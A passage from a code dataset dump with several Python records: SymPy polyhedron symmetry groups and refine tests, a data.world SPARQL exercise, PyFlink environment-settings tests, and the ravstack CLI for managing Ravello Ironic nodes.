dodecahedron, icosahedron)\n >>> [h.pgroup.is_group for h in polyhedra]\n ...\n [True, True, True, True, True]\n\n Although tests in polyhedron's test suite check that powers of the\n permutations in the groups generate all permutations of the vertices\n of the polyhedron, here we also demonstrate the powers of the given\n permutations create a complete group for the tetrahedron:\n\n >>> from sympy.combinatorics import Permutation, PermutationGroup\n >>> for h in polyhedra[:1]:\n ... G = h.pgroup\n ... perms = set()\n ... for g in G:\n ... for e in range(g.order()):\n ... p = tuple((g**e).array_form)\n ... perms.add(p)\n ...\n ... perms = [Permutation(p) for p in perms]\n ... assert PermutationGroup(perms).is_group\n\n In addition to doing the above, the tests in the suite confirm that the\n faces are all present after the application of each permutation.\n\n References\n ==========\n\n .. [1] http://dogschool.tripod.com/trianglegroup.html\n\n \"\"\"\n def _pgroup_of_double(polyh, ordered_faces, pgroup):\n n = len(ordered_faces[0])\n # the vertices of the double which sits inside a give polyhedron\n # can be found by tracking the faces of the outer polyhedron.\n # A map between face and the vertex of the double is made so that\n # after rotation the position of the vertices can be located\n fmap = dict(zip(ordered_faces,\n range(len(ordered_faces))))\n flat_faces = flatten(ordered_faces)\n new_pgroup = []\n for i, p in enumerate(pgroup):\n h = polyh.copy()\n h.rotate(p)\n c = h.corners\n # reorder corners in the order they should appear when\n # enumerating the faces\n reorder = unflatten([c[j] for j in flat_faces], n)\n # make them canonical\n reorder = [tuple(map(as_int,\n minlex(f, directed=False, is_set=True)))\n for f in reorder]\n # map face to vertex: the resulting list of vertices are the\n # permutation that we seek for the double\n new_pgroup.append(Perm([fmap[f] for f in reorder]))\n return new_pgroup\n\n tetrahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 1), # upper 3\n (1, 2, 3), # bottom\n ]\n\n # cw from top\n #\n _t_pgroup = [\n Perm([[1, 2, 3], [0]]), # cw from top\n Perm([[0, 1, 2], [3]]), # cw from front face\n Perm([[0, 3, 2], [1]]), # cw from back right face\n Perm([[0, 3, 1], [2]]), # cw from back left face\n Perm([[0, 1], [2, 3]]), # through front left edge\n Perm([[0, 2], [1, 3]]), # through front right edge\n Perm([[0, 3], [1, 2]]), # through back edge\n ]\n\n tetrahedron = Polyhedron(\n range(4),\n tetrahedron_faces,\n _t_pgroup)\n\n cube_faces = [\n (0, 1, 2, 3), # upper\n (0, 1, 5, 4), (1, 2, 6, 5), (2, 3, 7, 6), (0, 3, 7, 4), # middle 4\n (4, 5, 6, 7), # lower\n ]\n\n # U, D, F, B, L, R = up, down, front, back, left, right\n _c_pgroup = [Perm(p) for p in\n [\n [1, 2, 3, 0, 5, 6, 7, 4], # cw from top, U\n [4, 0, 3, 7, 5, 1, 2, 6], # cw from F face\n [4, 5, 1, 0, 7, 6, 2, 3], # cw from R face\n\n [1, 0, 4, 5, 2, 3, 7, 6], # cw through UF edge\n [6, 2, 1, 5, 7, 3, 0, 4], # cw through UR edge\n [6, 7, 3, 2, 5, 4, 0, 1], # cw through UB edge\n [3, 7, 4, 0, 2, 6, 5, 1], # cw through UL edge\n [4, 7, 6, 5, 0, 3, 2, 1], # cw through FL edge\n [6, 5, 4, 7, 2, 1, 0, 3], # cw through FR edge\n\n [0, 3, 7, 4, 1, 2, 6, 5], # cw through UFL vertex\n [5, 1, 0, 4, 6, 2, 3, 7], # cw through UFR vertex\n [5, 6, 2, 1, 4, 7, 3, 0], # cw through UBR vertex\n [7, 4, 0, 3, 6, 5, 1, 2], # cw through UBL\n ]]\n\n cube = Polyhedron(\n range(8),\n cube_faces,\n _c_pgroup)\n\n octahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 4), (0, 1, 4), # top 4\n (1, 2, 5), (2, 3, 5), (3, 4, 5), (1, 4, 5), # bottom 4\n ]\n\n octahedron = Polyhedron(\n range(6),\n octahedron_faces,\n _pgroup_of_double(cube, cube_faces, _c_pgroup))\n\n dodecahedron_faces = [\n (0, 1, 2, 3, 4), # top\n (0, 1, 6, 10, 5), (1, 2, 7, 11, 6), (2, 3, 8, 12, 7), # upper 5\n (3, 4, 9, 13, 8), (0, 4, 9, 14, 5),\n (5, 10, 16, 15, 14), (6, 10, 16, 17, 11), (7, 11, 17, 18,\n 12), # lower 5\n (8, 12, 18, 19, 13), (9, 13, 19, 15, 14),\n (15, 16, 17, 18, 19) # bottom\n ]\n\n def _string_to_perm(s):\n rv = [Perm(range(20))]\n p = None\n for si in s:\n if si not in '01':\n count = int(si) - 1\n else:\n count = 1\n if si == '0':\n p = _f0\n elif si == '1':\n p = _f1\n rv.extend([p]*count)\n return Perm.rmul(*rv)\n\n # top face cw\n _f0 = Perm([\n 1, 2, 3, 4, 0, 6, 7, 8, 9, 5, 11,\n 12, 13, 14, 10, 16, 17, 18, 19, 15])\n # front face cw\n _f1 = Perm([\n 5, 0, 4, 9, 14, 10, 1, 3, 13, 15,\n 6, 2, 8, 19, 16, 17, 11, 7, 12, 18])\n # the strings below, like 0104 are shorthand for F0*F1*F0**4 and are\n # the remaining 4 face rotations, 15 edge permutations, and the\n # 10 vertex rotations.\n _dodeca_pgroup = [_f0, _f1] + [_string_to_perm(s) for s in '''\n 0104 140 014 0410\n 010 1403 03104 04103 102\n 120 1304 01303 021302 03130\n 0412041 041204103 04120410 041204104 041204102\n 10 01 1402 0140 04102 0412 1204 1302 0130 03120'''.strip().split()]\n\n dodecahedron = Polyhedron(\n range(20),\n dodecahedron_faces,\n _dodeca_pgroup)\n\n icosahedron_faces = [\n (0, 1, 2), (0, 2, 3), (0, 3, 4), (0, 4, 5), (0, 1, 5),\n (1, 6, 7), (1, 2, 7), (2, 7, 8), (2, 3, 8), (3, 8, 9),\n (3, 4, 9), (4, 9, 10), (4, 5, 10), (5, 6, 10), (1, 5, 6),\n (6, 7, 11), (7, 8, 11), (8, 9, 11), (9, 10, 11), (6, 10, 11)]\n\n icosahedron = Polyhedron(\n range(12),\n icosahedron_faces,\n _pgroup_of_double(\n dodecahedron, dodecahedron_faces, _dodeca_pgroup))\n\n return (tetrahedron, cube, octahedron, dodecahedron, icosahedron,\n tetrahedron_faces, cube_faces, octahedron_faces,\n dodecahedron_faces, icosahedron_faces)\n\n# -----------------------------------------------------------------------\n# Standard Polyhedron groups\n#\n# These are generated using _pgroup_calcs() above. However to save\n# import time we encode them explicitly here.\n# -----------------------------------------------------------------------\n\ntetrahedron = Polyhedron(\n Tuple(0, 1, 2, 3),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 1, 3),\n Tuple(1, 2, 3)),\n Tuple(\n Perm(1, 2, 3),\n Perm(3)(0, 1, 2),\n Perm(0, 3, 2),\n Perm(0, 3, 1),\n Perm(0, 1)(2, 3),\n Perm(0, 2)(1, 3),\n Perm(0, 3)(1, 2)\n ))\n\ncube = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7),\n Tuple(\n Tuple(0, 1, 2, 3),\n Tuple(0, 1, 5, 4),\n Tuple(1, 2, 6, 5),\n Tuple(2, 3, 7, 6),\n Tuple(0, 3, 7, 4),\n Tuple(4, 5, 6, 7)),\n Tuple(\n Perm(0, 1, 2, 3)(4, 5, 6, 7),\n Perm(0, 4, 5, 1)(2, 3, 7, 6),\n Perm(0, 4, 7, 3)(1, 5, 6, 2),\n Perm(0, 1)(2, 4)(3, 5)(6, 7),\n Perm(0, 6)(1, 2)(3, 5)(4, 7),\n Perm(0, 6)(1, 7)(2, 3)(4, 5),\n Perm(0, 3)(1, 7)(2, 4)(5, 6),\n Perm(0, 4)(1, 7)(2, 6)(3, 5),\n Perm(0, 6)(1, 5)(2, 4)(3, 7),\n Perm(1, 3, 4)(2, 7, 5),\n Perm(7)(0, 5, 2)(3, 4, 6),\n Perm(0, 5, 7)(1, 6, 3),\n Perm(0, 7, 2)(1, 4, 6)))\n\noctahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 3, 4),\n Tuple(0, 1, 4),\n Tuple(1, 2, 5),\n Tuple(2, 3, 5),\n Tuple(3, 4, 5),\n Tuple(1, 4, 5)),\n Tuple(\n Perm(5)(1, 2, 3, 4),\n Perm(0, 4, 5, 2),\n Perm(0, 1, 5, 3),\n Perm(0, 1)(2, 4)(3, 5),\n Perm(0, 2)(1, 3)(4, 5),\n Perm(0, 3)(1, 5)(2, 4),\n Perm(0, 4)(1, 3)(2, 5),\n Perm(0, 5)(1, 4)(2, 3),\n Perm(0, 5)(1, 2)(3, 4),\n Perm(0, 4, 1)(2, 3, 5),\n Perm(0, 1, 2)(3, 4, 5),\n Perm(0, 2, 3)(1, 5, 4),\n Perm(0, 4, 3)(1, 5, 2)))\n\ndodecahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19),\n Tuple(\n Tuple(0, 1, 2, 3, 4),\n Tuple(0, 1, 6, 10, 5),\n Tuple(1, 2, 7, 11, 6),\n Tuple(2, 3, 8, 12, 7),\n Tuple(3, 4, 9, 13, 8),\n Tuple(0, 4, 9, 14, 5),\n Tuple(5, 10, 16, 15, 14),\n Tuple(6, 10, 16, 17, 11),\n Tuple(7, 11, 17, 18, 12),\n Tuple(8, 12, 18, 19, 13),\n Tuple(9, 13, 19, 15, 14),\n Tuple(15, 16, 17, 18, 19)),\n Tuple(\n Perm(0, 1, 2, 3, 4)(5, 6, 7, 8, 9)(10, 11, 12, 13, 14)(15, 16, 17, 18, 19),\n Perm(0, 5, 10, 6, 1)(2, 4, 14, 16, 11)(3, 9, 15, 17, 7)(8, 13, 19, 18, 12),\n Perm(0, 10, 17, 12, 3)(1, 6, 11, 7, 2)(4, 5, 16, 18, 8)(9, 14, 15, 19, 13),\n Perm(0, 6, 17, 19, 9)(1, 11, 18, 13, 4)(2, 7, 12, 8, 3)(5, 10, 16, 15, 14),\n Perm(0, 2, 12, 19, 14)(1, 7, 18, 15, 5)(3, 8, 13, 9, 4)(6, 11, 17, 16, 10),\n Perm(0, 4, 9, 14, 5)(1, 3, 13, 15, 10)(2, 8, 19, 16, 6)(7, 12, 18, 17, 11),\n Perm(0, 1)(2, 5)(3, 10)(4, 6)(7, 14)(8, 16)(9, 11)(12, 15)(13, 17)(18, 19),\n Perm(0, 7)(1, 2)(3, 6)(4, 11)(5, 12)(8, 10)(9, 17)(13, 16)(14, 18)(15, 19),\n Perm(0, 12)(1, 8)(2, 3)(4, 7)(5, 18)(6, 13)(9, 11)(10, 19)(14, 17)(15, 16),\n Perm(0, 8)(1, 13)(2, 9)(3, 4)(5, 12)(6, 19)(7, 14)(10, 18)(11, 15)(16, 17),\n Perm(0, 4)(1, 9)(2, 14)(3, 5)(6, 13)(7, 15)(8, 10)(11, 19)(12, 16)(17, 18),\n Perm(0, 5)(1, 14)(2, 15)(3, 16)(4, 10)(6, 9)(7, 19)(8, 17)(11, 13)(12, 18),\n Perm(0, 11)(1, 6)(2, 10)(3, 16)(4, 17)(5, 7)(8, 15)(9, 18)(12, 14)(13, 19),\n Perm(0, 18)(1, 12)(2, 7)(3, 11)(4, 17)(5, 19)(6, 8)(9, 16)(10, 13)(14, 15),\n Perm(0, 18)(1, 19)(2, 13)(3, 8)(4, 12)(5, 17)(6, 15)(7, 9)(10, 16)(11, 14),\n Perm(0, 13)(1, 19)(2, 15)(3, 14)(4, 9)(5, 8)(6, 18)(7, 16)(10, 12)(11, 17),\n Perm(0, 16)(1, 15)(2, 19)(3, 18)(4, 17)(5, 10)(6, 14)(7, 13)(8, 12)(9, 11),\n Perm(0, 18)(1, 17)(2, 16)(3, 15)(4, 19)(5, 12)(6, 11)(7, 10)(8, 14)(9, 13),\n Perm(0, 15)(1, 19)(2, 18)(3, 17)(4, 16)(5, 14)(6, 13)(7, 12)(8, 11)(9, 10),\n Perm(0, 17)(1, 16)(2, 15)(3, 19)(4, 18)(5, 11)(6, 10)(7, 14)(8, 13)(9, 12),\n Perm(0, 19)(1, 18)(2, 17)(3, 16)(4, 15)(5, 13)(6, 12)(7, 11)(8, 10)(9, 14),\n Perm(1, 4, 5)(2, 9, 10)(3, 14, 6)(7, 13, 16)(8, 15, 11)(12, 19, 17),\n Perm(19)(0, 6, 2)(3, 5, 11)(4, 10, 7)(8, 14, 17)(9, 16, 12)(13, 15, 18),\n Perm(0, 11, 8)(1, 7, 3)(4, 6, 12)(5, 17, 13)(9, 10, 18)(14, 16, 19),\n Perm(0, 7, 13)(1, 12, 9)(2, 8, 4)(5, 11, 19)(6, 18, 14)(10, 17, 15),\n Perm(0, 3, 9)(1, 8, 14)(2, 13, 5)(6, 12, 15)(7, 19, 10)(11, 18, 16),\n Perm(0, 14, 10)(1, 9, 16)(2, 13, 17)(3, 19, 11)(4, 15, 6)(7, 8, 18),\n Perm(0, 16, 7)(1, 10, 11)(2, 5, 17)(3, 14, 18)(4, 15, 12)(8, 9, 19),\n Perm(0, 16, 13)(1, 17, 8)(2, 11, 12)(3, 6, 18)(4, 10, 19)(5, 15, 9),\n Perm(0, 11, 15)(1, 17, 14)(2, 18, 9)(3, 12, 13)(4, 7, 19)(5, 6, 16),\n Perm(0, 8, 15)(1, 12, 16)(2, 18, 10)(3, 19, 5)(4, 13, 14)(6, 7, 17)))\n\nicosahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 3, 4),\n Tuple(0, 4, 5),\n Tuple(0, 1, 5),\n Tuple(1, 6, 7),\n Tuple(1, 2, 7),\n Tuple(2, 7, 8),\n Tuple(2, 3, 8),\n Tuple(3, 8, 9),\n Tuple(3, 4, 9),\n Tuple(4, 9, 10),\n Tuple(4, 5, 10),\n Tuple(5, 6, 10),\n Tuple(1, 5, 6),\n Tuple(6, 7, 11),\n Tuple(7, 8, 11),\n Tuple(8, 9, 11),\n Tuple(9, 10, 11),\n Tuple(6, 10, 11)),\n Tuple(\n Perm(11)(1, 2, 3, 4, 5)(6, 7, 8, 9, 10),\n Perm(0, 5, 6, 7, 2)(3, 4, 10, 11, 8),\n Perm(0, 1, 7, 8, 3)(4, 5, 6, 11, 9),\n Perm(0, 2, 8, 9, 4)(1, 7, 11, 10, 5),\n Perm(0, 3, 9, 10, 5)(1, 2, 8, 11, 6),\n Perm(0, 4, 10, 6, 1)(2, 3, 9, 11, 7),\n Perm(0, 1)(2, 5)(3, 6)(4, 7)(8, 10)(9, 11),\n Perm(0, 2)(1, 3)(4, 7)(5, 8)(6, 9)(10, 11),\n Perm(0, 3)(1, 9)(2, 4)(5, 8)(6, 11)(7, 10),\n Perm(0, 4)(1, 9)(2, 10)(3, 5)(6, 8)(7, 11),\n Perm(0, 5)(1, 4)(2, 10)(3, 6)(7, 9)(8, 11),\n Perm(0, 6)(1, 5)(2, 10)(3, 11)(4, 7)(8, 9),\n Perm(0, 7)(1, 2)(3, 6)(4, 11)(5, 8)(9, 10),\n Perm(0, 8)(1, 9)(2, 3)(4, 7)(5, 11)(6, 10),\n Perm(0, 9)(1, 11)(2, 10)(3, 4)(5, 8)(6, 7),\n Perm(0, 10)(1, 9)(2, 11)(3, 6)(4, 5)(7, 8),\n Perm(0, 11)(1, 6)(2, 10)(3, 9)(4, 8)(5, 7),\n Perm(0, 11)(1, 8)(2, 7)(3, 6)(4, 10)(5, 9),\n Perm(0, 11)(1, 10)(2, 9)(3, 8)(4, 7)(5, 6),\n Perm(0, 11)(1, 7)(2, 6)(3, 10)(4, 9)(5, 8),\n Perm(0, 11)(1, 9)(2, 8)(3, 7)(4, 6)(5, 10),\n Perm(0, 5, 1)(2, 4, 6)(3, 10, 7)(8, 9, 11),\n Perm(0, 1, 2)(3, 5, 7)(4, 6, 8)(9, 10, 11),\n Perm(0, 2, 3)(1, 8, 4)(5, 7, 9)(6, 11, 10),\n Perm(0, 3, 4)(1, 8, 10)(2, 9, 5)(6, 7, 11),\n Perm(0, 4, 5)(1, 3, 10)(2, 9, 6)(7, 8, 11),\n Perm(0, 10, 7)(1, 5, 6)(2, 4, 11)(3, 9, 8),\n Perm(0, 6, 8)(1, 7, 2)(3, 5, 11)(4, 10, 9),\n Perm(0, 7, 9)(1, 11, 4)(2, 8, 3)(5, 6, 10),\n Perm(0, 8, 10)(1, 7, 6)(2, 11, 5)(3, 9, 4),\n Perm(0, 9, 6)(1, 3, 11)(2, 8, 7)(4, 10, 5)))\n\ntetrahedron_faces = list(tuple(arg) for arg in tetrahedron.faces)\n\ncube_faces = list(tuple(arg) for arg in cube.faces)\n\noctahedron_faces = list(tuple(arg) for arg in octahedron.faces)\n\ndodecahedron_faces = list(tuple(arg) for arg in dodecahedron.faces)\n\nicosahedron_faces = list(tuple(arg) for arg in icosahedron.faces)\n"} {"ext": "py", "sha": "1a2f1d56fc766affd2507772267dadcf41f8a7af", "content": "# datadotworld module has been imported as dw\nimport datadotworld as dw\n\n# We've written a SPARQL query for you and assigned it to the `sparql_query` variable:\nsparql_query = \"PREFIX GOT: SELECT ?FName ?LName WHERE {?person GOT:col-got-house \\\"Stark\\\" . ?person GOT:col-got-fname ?FName . ?person GOT:col-got-lname ?LName .}\"\n\n# Use the pre-defined SPARQL query to query dataset http://data.world/tutorial/sparqltutorial and return the results to a queryResults variable\n\nqueryResults = dw.query(\"http://data.world/tutorial/sparqltutorial\" , sparql_query, query_type = 'sparql')\n\n# Use the dataframe property of the resulting query to create a dataframe variable named `houseStark`\nhouseStark = queryResults.dataframe\n\n# Use pp.pprint() to print the dataframe to the screen.\npp.pprint(houseStark)\n"} {"ext": "py", "sha": "1a2f1ed612e9240a51a9e4eab2cde64ae038814e", "content": "################################################################################\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\nfrom pyflink.java_gateway import get_gateway\n\nfrom pyflink.common import Configuration\nfrom pyflink.table import EnvironmentSettings\nfrom pyflink.testing.test_case_utils import PyFlinkTestCase\n\n\nclass EnvironmentSettingsTests(PyFlinkTestCase):\n\n def test_mode_selection(self):\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n environment_settings = builder.build()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n # test in_streaming_mode\n environment_settings = builder.in_streaming_mode().build()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n environment_settings = EnvironmentSettings.in_streaming_mode()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n # test in_batch_mode\n environment_settings = builder.in_batch_mode().build()\n self.assertFalse(environment_settings.is_streaming_mode())\n\n environment_settings = EnvironmentSettings.in_batch_mode()\n self.assertFalse(environment_settings.is_streaming_mode())\n\n def test_with_built_in_catalog_name(self):\n\n gateway = get_gateway()\n\n DEFAULT_BUILTIN_CATALOG = gateway.jvm.TableConfigOptions.TABLE_CATALOG_NAME.defaultValue()\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n environment_settings = builder.build()\n\n self.assertEqual(environment_settings.get_built_in_catalog_name(), DEFAULT_BUILTIN_CATALOG)\n\n environment_settings = builder.with_built_in_catalog_name(\"my_catalog\").build()\n\n self.assertEqual(environment_settings.get_built_in_catalog_name(), \"my_catalog\")\n\n def test_with_built_in_database_name(self):\n\n gateway = get_gateway()\n\n DEFAULT_BUILTIN_DATABASE = gateway.jvm.TableConfigOptions.TABLE_DATABASE_NAME.defaultValue()\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n environment_settings = builder.build()\n\n self.assertEqual(environment_settings.get_built_in_database_name(),\n DEFAULT_BUILTIN_DATABASE)\n\n environment_settings = builder.with_built_in_database_name(\"my_database\").build()\n\n self.assertEqual(environment_settings.get_built_in_database_name(), \"my_database\")\n\n def test_to_configuration(self):\n\n expected_settings = EnvironmentSettings.new_instance().in_batch_mode().build()\n config = expected_settings.to_configuration()\n\n self.assertEqual(\"BATCH\", config.get_string(\"execution.runtime-mode\", \"stream\"))\n\n def test_from_configuration(self):\n\n config = Configuration()\n config.set_string(\"execution.runtime-mode\", \"batch\")\n\n actual_setting = EnvironmentSettings.from_configuration(config)\n self.assertFalse(actual_setting.is_streaming_mode(), \"Use batch mode.\")\n"} {"ext": "py", "sha": "1a2f200557e96a55d1fb6a17f5f1b0e0467a0c05", "content": "#\n# This file is part of ravstack. Ravstack is free software available under\n# the terms of the MIT license. See the file \"LICENSE\" that was provided\n# together with this source file for the licensing terms.\n#\n# Copyright (c) 2015 the ravstack authors. See the file \"AUTHORS\" for a\n# complete list.\n\n\"\"\"Ravello Ironic command-line utility.\n\nUsage:\n ravstack [options] setup\n ravstack [options] proxy-create\n ravstack [options] node-create [-c ] [-m ]\n [-D ] [-n ]\n ravstack [options] node-dump\n ravstack [options] node-list [--all [--cached]]\n ravstack [options] node-start \n ravstack [options] node-stop \n ravstack [options] node-reboot \n ravstack [options] node-get-boot-device \n ravstack [options] node-set-boot-device \n ravstack [options] node-get-macs [--cached]\n ravstack [options] fixup\n ravstack [options] endpoint-resolve [-t ]\n [--start-port ] [--num-ports ]\n ravstack --help\n\nCommand help:\n setup Create ravstack directories and config file.\n proxy-create Create SSH -> Ravello API proxy.\n node-create Create a new node.\n node-dump Dump node definitions to specified file.\n node-list List powered on nodes. (--all lists all nodes)\n node-start Start a node.\n node-stop Stop a node.\n node-reboot Reboot a node.\n node-get-boot-device Return boot device for .\n node-set-boot-device Set boot device for to .\n The boot device may be \"hd\" or \"network\".\n node-get-macs Return MAC addresses for .\n fixup Fix Ravello and OS config after one or\n more nodes were deployed.\n endpoint-resolve Resolve an endpoint for a local service using\n a public IP address or under portmapping.\n\nOptions:\n -d, --debug Enable debugging.\n -v, --verbose Be verbose.\n --log-stderr Show logs on standard error.\n -u , --username=\n Ravello API username.\n -p , --password=\n Ravello API password.\n -a , --application=\n The Ravello application name.\n --all List all nodes.\n --cached Allow use of cached information.\n\nOptions for `node-create`:\n -c , --cpus=\n The number of CPUs. [default: 2]\n -m , --memory=\n The amount of memory in MB. [default: 8192]\n -D , --disk=\n The size of the disk in GB. [default: 60]\n -n , --count=\n The number of nodes to create. [default: 1]\n\nOptions for `endpoint-resolve`:\n -t , --timeout \n Timeout. [default: 2]\n --start-port Starting port for endpoint resolution with\n portmapping. [default: 10000]\n --num-ports Number of ports to scan for endpoint resulution\n with portmapping. [default: 50]\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport docopt\n\nfrom . import factory, setup, node, proxy, fixup, endpoint, runtime\nfrom .runtime import CONF\n\n\ndef main():\n \"\"\"Ravstack main entry point.\"\"\"\n\n args = docopt.docopt(__doc__)\n CONF.update_from_args(args)\n CONF.update_to_env()\n runtime.setup_logging() # logging configuration might have changed\n\n env = factory.get_environ(args)\n\n if args['setup']:\n setup.do_setup(env)\n elif args['proxy-create']:\n proxy.do_create(env)\n elif args['node-create']:\n node.do_create(env)\n elif args['node-dump']:\n node.do_dump(env)\n elif args['node-list'] and not args.get('--all'):\n node.do_list_running(env, False)\n elif args['node-list']:\n node.do_list_all(env)\n elif args['node-start']:\n node.do_start(env, args[''])\n elif args['node-stop']:\n node.do_stop(env, args[''])\n elif args['node-reboot']:\n node.do_reboot(env, args[''])\n elif args['node-get-boot-device']:\n node.do_get_boot_device(env, args[''])\n elif args['node-set-boot-device']:\n node.do_set_boot_device(env, args[''], args[''])\n elif args['node-get-macs']:\n node.do_get_macs(env, args[''], False)\n elif args['fixup']:\n fixup.do_fixup(env)\n elif args['endpoint-resolve']:\n endpoint.do_resolve(env, args[''])\n\n\ndef run_main():\n \"\"\"Setuptools entry point.\"\"\"\n runtime.run_main(main)\n\n\nif __name__ == '__main__':\n run_main()\n"} {"ext": "py", "sha": "1a2f2082e47d81d711d46d913e34e347eef20e68", "content": "from sympy import (Abs, exp, Expr, I, pi, Q, Rational, refine, S, sqrt,\n atan, atan2, nan, Symbol)\nfrom sympy.abc import x, y, z\nfrom sympy.core.relational import Eq, Ne\nfrom sympy.functions.elementary.piecewise import Piecewise\nfrom sympy.utilities.pytest import slow\n\n\ndef test_Abs():\n assert refine(Abs(x), Q.positive(x)) == x\n assert refine(1 + Abs(x), Q.positive(x)) == 1 + x\n assert refine(Abs(x), Q.negative(x)) == -x\n assert refine(1 + Abs(x), Q.negative(x)) == 1 - x\n\n assert refine(Abs(x**2)) != x**2\n assert refine(Abs(x**2), Q.real(x)) == x**2\n\n\n@slow\ndef test_pow1():\n assert refine((-1)**x, Q.even(x)) == 1\n assert refine((-1)**x, Q.odd(x)) == -1\n assert refine((-2)**x, Q.even(x)) == 2**x\n\n # nested powers\n assert refine(sqrt(x**2)) != Abs(x)\n assert refine(sqrt(x**2), Q.complex(x)) != Abs(x)\n assert refine(sqrt(x**2), Q.real(x)) == Abs(x)\n assert refine(sqrt(x**2), Q.positive(x)) == x\n assert refine((x**3)**(S(1)/3)) != x\n\n assert refine((x**3)**(S(1)/3), Q.real(x)) != x\n assert refine((x**3)**(S(1)/3), Q.positive(x)) == x\n\n assert refine(sqrt(1/x), Q.real(x)) != 1/sqrt(x)\n assert refine(sqrt(1/x), Q.positive(x)) == 1/sqrt(x)\n\n\n@slow\ndef test_pow2():\n # powers of (-1)\n assert refine((-1)**(x + y), Q.even(x)) == (-1)**y\n assert refine((-1)**(x + y + z), Q.odd(x) & Q.odd(z)) == (-1)**y\n assert refine((-1)**(x + y + 1), Q.odd(x)) == (-1)**y\n assert refine((-1)**(x + y + 2), Q.odd(x)) == (-1)**(y + 1)\n assert refine((-1)**(x + 3)) == (-1)**(x + 1)\n\n\n@slow\ndef test_pow3():\n # continuation\n assert refine((-1)**((-1)**x/2 - S.Half), Q.integer(x)) == (-1)**x\n assert refine((-1)**((-1)**x/2 + S.Half), Q.integer(x)) == (-1)**(x + 1)\n assert refine((-1)**((-1)**x/2 + 5*S.Half), Q.integer(x)) == (-1)**(x + 1)\n\n\n@slow\ndef test_pow4():\n assert refine((-1)**((-1)**x/2 - 7*S.Half), Q.integer(x)) == (-1)**(x + 1)\n assert refine((-1)**((-1)**x/2 - 9*S.Half), Q.integer(x)) == (-1)**x\n\n # powers of Abs\n assert refine(Abs(x)**2, Q.real(x)) == x**2\n assert refine(Abs(x)**3, Q.real(x)) == Abs(x)**3\n assert refine(Abs(x)**2) == Abs(x)**2\n\n\ndef test_exp():\n x = Symbol('x', integer=True)\n assert refine(exp(pi*I*2*x)) == 1\n assert refine(exp(pi*I*2*(x + Rational(1, 2)))) == -1\n assert refine(exp(pi*I*2*(x + Rational(1, 4)))) == I\n assert refine(exp(pi*I*2*(x + Rational(3, 4)))) == -I\n\n\ndef test_Relational():\n assert not refine(x < 0, ~Q.is_true(x < 0))\n assert refine(x < 0, Q.is_true(x < 0))\n assert refine(x < 0, Q.is_true(0 > x)) == True\n assert refine(x < 0, Q.is_true(y < 0)) == (x < 0)\n assert not refine(x <= 0, ~Q.is_true(x <= 0))\n assert refine(x <= 0, Q.is_true(x <= 0))\n assert refine(x <= 0, Q.is_true(0 >= x)) == True\n assert refine(x <= 0, Q.is_true(y <= 0)) == (x <= 0)\n assert not refine(x > 0, ~Q.is_true(x > 0))\n assert refine(x > 0, Q.is_true(x > 0))\n assert refine(x > 0, Q.is_true(0 < x)) == True\n assert refine(x > 0, Q.is_true(y > 0)) == (x > 0)\n assert not refine(x >= 0, ~Q.is_true(x >= 0))\n assert refine(x >= 0, Q.is_true(x >= 0))\n assert refine(x >= 0, Q.is_true(0 <= x)) == True\n assert refine(x >= 0, Q.is_true(y >= 0)) == (x >= 0)\n assert not refine(Eq(x, 0), ~Q.is_true(Eq(x, 0)))\n assert refine(Eq(x, 0), Q.is_true(Eq(x, 0)))\n assert refine(Eq(x, 0), Q.is_true(Eq(0, x))) == True\n assert refine(Eq(x, 0), Q.is_true(Eq(y, 0))) == Eq(x, 0)\n assert not refine(Ne(x, 0), ~Q.is_true(Ne(x, 0)))\n assert refine(Ne(x, 0), Q.is_true(Ne(0, x))) == True\n assert refine(Ne(x, 0), Q.is_true(Ne(x, 0)))\n assert refine(Ne(x, 0), Q.is_true(Ne(y, 0))) == (Ne(x, 0))\n\n\ndef test_Piecewise():\n assert refine(Piecewise((1, x < 0), (3, True)), Q.is_true(x < 0)) == 1\n assert refine(Piecewise((1, x < 0), (3, True)), ~Q.is_true(x < 0)) == 3\n assert refine(Piecewise((1, x < 0), (3, True)), Q.is_true(y < 0)) == \\\n Piecewise((1, x < 0), (3, True))\n assert refine(Piecewise((1, x > 0), (3, True)), Q.is_true(x > 0)) == 1\n assert refine(Piecewise((1, x > 0), (3, True)), ~Q.is_true(x > 0)) == 3\n assert refine(Piecewise((1, x > 0), (3, True)), Q.is_true(y > 0)) == \\\n Piecewise((1, x > 0), (3, True))\n assert refine(Piecewise((1, x <= 0), (3, True)), Q.is_true(x <= 0)) == 1\n assert refine(Piecewise((1, x <= 0), (3, True)), ~Q.is_true(x <= 0)) == 3\n assert refine(Piecewise((1, x <= 0), (3, True)), Q.is_true(y <= 0)) == \\\n Piecewise((1, x <= 0), (3, True))\n assert refine(Piecewise((1, x >= 0), (3, True)), Q.is_true(x >= 0)) == 1\n assert refine(Piecewise((1, x >= 